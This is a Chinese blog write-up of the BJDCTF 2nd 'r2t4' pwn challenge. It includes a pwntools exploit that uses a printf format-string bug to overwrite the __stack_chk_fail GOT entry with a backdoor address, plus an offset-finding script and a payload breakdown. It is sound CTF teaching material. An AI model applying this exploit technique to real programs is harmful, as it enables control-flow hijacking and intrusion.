[BJDCTF 2nd]r2t4

最新推荐文章于 2022-10-24 18:09:11 发布
最新推荐文章于 2022-10-24 18:09:11 发布
阅读量286 收藏 2
点赞数
分类专栏: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/112297305
版权
ctf 同时被 2 个专栏收录
25 篇文章 0 订阅
订阅专栏
pwn
12 篇文章 1 订阅
订阅专栏

先查看一下程序的保护,是一个64位的程序,开启了堆栈不可执行保护和金丝雀
在这里插入图片描述
用IDA分析一下程序,main函数中先读取用户输入,然后格式化输出buf区域内容
在这里插入图片描述
还发现了一个名为backdoor的函数,这个函数可以执行系统命令读取flag的内容
在这里插入图片描述
首先,printf函数存在格式化输出漏洞,通过格式化输出我们可以确定偏移
在这里插入图片描述
也可以直接用libformatstr计算

from libformatstr import *
from pwn import *
from binascii import *
context.log_level = 'debug'
bufsiz = 50
elf = ELF('./r2t4')
r = process('./r2t4')
r.sendline(make_pattern(bufsiz))
data = r.recv()
offset, padding = guess_argnum(data,bufsiz)
log.info("offset :" + str(offset))
log.info("padding :"+str(padding))

在这里插入图片描述
得到偏移为6
虽然read存在溢出,且格式化输出漏洞也会造成canary leak,但是溢出的长度太短,而且只有一次read,无法继续向栈中继续写入payload,因此常规的栈溢出无法利用
但是,这里可以通过劫持__stack_chk_fail函数来达到控制程序流的目的
__ stack_check_fail本质上也只是动态加载的一个库函数,和puts是一样的。如果程序中没有调用别的可控函数,那么就可以先劫持__stack_chk_fail函数,再故意引发canary错误,从而调用目标函数。
整理一下思路,利用格式化字符串漏洞修改got表中的__stack_chk_fail函数为我们的后门函数backdoor的地址,再故意造成溢出从而执行后门函数。
参考两篇文章 64位格式化字符串漏洞修改got表利用详解格式化字符串漏洞利用

  1. 32位的payload :payload = p32(泄露地址) + %偏移$x,这不适用64位。因为64位地址高位多为
    ‘\00’,这样就会使我们send 的地址和我们构造的格式化字符串中间还有好多个 ‘\00’ ,而在字符串中 ‘\00’
    就代表了结束,所以在printf到’\00’时,就被认为字符串已经结束了,自然不会继续往后面printf了。所以我们需要把地址放到后面
  2. 或许有人会这么构造payload = ‘a’ * backdoor_addr + %偏移$n +
    p64(__stack_chk_fail),但想想这里要读入多少个’a’啊!谁的程序中会一次读取那么多字符?所以要换为另一个格式字符,%c
    ,读入的字符屈指可数,但经过格式化漏洞转换后,那就是num个字符的输出同样可以达到相同的修改数据的效果
  3. 64位程序,printf在输出大量字符时有时会异常,就像前面一次性读入大量字符会异常一样,printf在一次性输出这么大量的字符时也会出现异常。所以解决办法便是一个一个字节来做出修改或者两个两个来,具体怎么修改这里不展开讲了。

system(“cat flag")的地址为0x00400626,因为是小端存储,所以我们需要将高字节写入高地址,低字节写入低地址,也是就将0x0040写入0x601018+2的地址,0x0626写入0x601018,这样系统再读0x601018的内容时也就识别为0x00400626
在这里插入图片描述
这里exp使用的$hn表示是以2个字节写入,一次写入2字节,当然也可以选择一次写入4、8字节但是这样可能会导致程序崩溃,所以具体多少字节的写入要看具体情况(%$hhn表示写入的地址空间为1字节,$n表示写入的地址空间为4字节,%$lln表示写入的地址空间为8字节)

exp:

from pwn import *

context.log_level = 'debug'

p = remote("node3.buuoj.cn",29497)

elf = ELF('./r2t4')

__stack_chk_fail=elf.got['__stack_chk_fail']
print len(p64(__stack_chk_fail+2))
pay = "%64c%9$hn%1510c%10$hnAAA" + p64(__stack_chk_fail+2) + p64(__stack_chk_fail)
#pay = "%4195878c%8$nAAA" + p64(__stack_chk_fail) + "a"*17
p.sendline(pay)
p.interactive()

%64c%9$hn%1510c%10$hnAAA"这一串做个解释

64:0x40,对应backdoor函数地址的高两字节0x0040
9:由于格式化字符串%64c%9$hn%1510c%10$hnAAA占用了24个字节,根据64程序,所以偏移6+3=9
$hn:将已输出的字符数低2字节写到指定地址
1510:1510+64=1574=0x626,对应backdoor函数地址的低两字节0x0626
10 :在偏移9的基础上加上p64(__stack_chk_fail+2)地址的一字节,即偏移为10
AAA:填充作用,栈对齐,使之为8的倍数
p64(__ stack_chk_fail+2) + p64(__stack_chk_fail) :将backdoor函数地址分为高两个字节和低两字节进行写入
沫忆末忆
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 567
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
攻防世界 Pwn 新手
yongbaoii的博客
10-04 3089
是一个总结与汇总,会把见到的思路,想法,wp都记录下来,并进行简单的分类 这里面的每个题我都没有去检查保护,太麻烦,新手区也没有需要绕过保护的,最简单的canary绕过也在进阶。 ps:我这里用的是python2.7。如果用python3的话代码会有一个致命的不同,看我的另外一篇博客 字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题 01 get_shell 1、nc连接就行2、简单的exp from pwn import* r=remote("220.249.52.133
[BJDCTF 2nd] r2t4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 849
题目下载地址:点此下载 查保护 此处存在格式化字符串漏洞 利用格式化字符串漏洞复写got表中的__stack_chk_fail地址,这个函数的作用是,当程序出现栈溢出的时候执行此函数,利用格式化字符串漏洞把这个函数的got表地址覆盖为后门函数 EXP: from pwn import * context(arch='amd64',os='linux',word_size='64') #p...
CTF-Pwn-[BJDCTF 2nd]r2t4
归子莫的博客
05-06 1065
CTF-Pwn-[BJDCTF 2nd]r2t4 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]r2t4 下载题目的文件 r2t4 思路 使用file命令查看,发现是...
[BJDCTF 2nd]r2t4 [格式化字符串写GOT]
、moddemod
06-24 336
开启了Canary,但Canary失败的处理逻辑会进入到stack_chk_failed函数,stack_chk_failed函数是一个普通的延迟绑定函数,可以通过修改GOT表劫持这个函数。 exp from pwn import * context(log_level='debug') proc_name = './r2t4' p = process(proc_name) # p = remote('node3.buuoj.cn', 29985) elf = ELF(proc_name) __...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Mastering Typescript 2nd Edition
03-17
Mastering Typescript 2nd Edition, 英文版, 含epub电子书。 作者:Nathan Rozentals, 2017. Typescript 主要用于支持Angualar2和其他的网页前端构架。
[BUUCTF]PWN——[BJDCTF 2nd]r2t4
mcmuyanga的博客
10-31 395
[BJDCTF 2nd]r2t4 附件 步骤 例行检查,64位,开启了canary和nx 64位ida载入,检索字符串的时候发现了后面函数,shell_addr=0x400626 main函数 可以溢出0x8字节,输出点存在格式化字符串漏洞 https://blog.csdn.net/weixin_44864859/article/details/105129673?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMac
Sokoban_Game:推箱子游戏
06-27
推箱子_游戏 推箱子游戏 用Java语言开发来模拟推箱子游戏。 该项目包括在每个控制台用 Java 语言模拟推箱子游戏(仓库管理器),其中包括在平面上的特定点放置盒子,为此需要实现各种数据结构和分辨率算法,以提供完整和详细的游戏,能够验证用户确定的动作并符合游戏制定的规则。 以及提供使用 .XSB 格式的文件的可能性,这些文件代表能够在平台内播放的级别。 编程语言:Java。 开发环境:Netbeans。
PWN入门01[攻防世界]
qq_43746493的博客
03-06 373
题目描述: 菜鸡了解了什么是溢出,他相信自己能得到shell 题目链接: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 环境:Kali+IDA Freeware7.6(之前在Ubuntu20上安装IDA6.4,F5无法查看伪代码) 参考博文: https://blog.csdn.net/qq_39596232/article/details/100036147
攻防世界 PWN新手练习区 hello_pwn
m0_54262894的博客
08-19 163
攻防世界 hello_pwn 先checksec一下,只开启了NX保护 放入IDA中查看一下伪C代码 发现程序很简单,只有两个puts函数,一个read函数和一个if语句 通过读程不难发现read函数是我们攻击的一个点,只要覆盖了read函数分配的空间就可以做我们想要做的事情 双击sub_400686板块,发现可以直接执行 cat flag.txt 命令 那么思路就更加清晰了 所以让dword_60106C==1853186401就可以执行...
Java pwn_CTF-Pwn-[BJDCTF 2nd]r2t4
weixin_30698721的博客
02-26 285
CTF-Pwn-[BJDCTF 2nd]r2t4博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challenges题目Pwn类,[BJDCTF 2nd]r2t4下载题目的文件r2t4思路使用file命令查看,发现是64位的文件,使用ida64...
BJDCTF-PWN r2t4详解
weixin_44864859的博客
03-26 1023
BJDCTF_r2t4 考点:用格式化字符串写__stack_chk_fail 函数来 bypass canary 由于涉及到格式化字符串漏洞的利用,所以基本原理和利用方法要先有一定的了解。推荐先阅读CTF-wiki: 格式化字符串漏洞原理介绍 格式化字符串漏洞利用 1.首先检查程序的基础信息 64位程序,可以看到开启了NX和Stack防护 2.运行程序,对程序功能有基本了解 程序基本功能:对...
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1849
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
Astar2018 初赛R2T4 p1m2
iwi
08-15 212
题目: 度度熊很喜欢数组!! 我们称一个整数数组为稳定的,若且唯若其同时符合以下两个条件: 1. 数组里面的元素都是非负整数。 2. 数组里面最大的元素跟最小的元素的差值不超过 1。 举例而言,[1,2,1,2] 是稳定的,而 [−1,0,−1] 跟 [1,2,3] 都不是。 现在,定义一个在整数数组进行的操作: * 选择数组中两个不同的元素 a 以及 b,将 a 减去...
BJDCTF_2nd PWN复盘
weixin_44145820的博客
03-26 548
目录r2t3one_gadgetydsneedgirlfriend2r2t4 r2t3 在name_check函数中有一个strcpy,看起来是溢出的机会,但是前面判断了长度,这里在汇编下才能发现漏洞 即只要长度超过255就会溢出 Exp: from pwn import * r = remote("node3.buuoj.cn", 29302) elf = ELF("./BJDCTF_2...
攻防世界-game
最新发布
qq_70851535的博客
10-24 519
逆向题目分析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值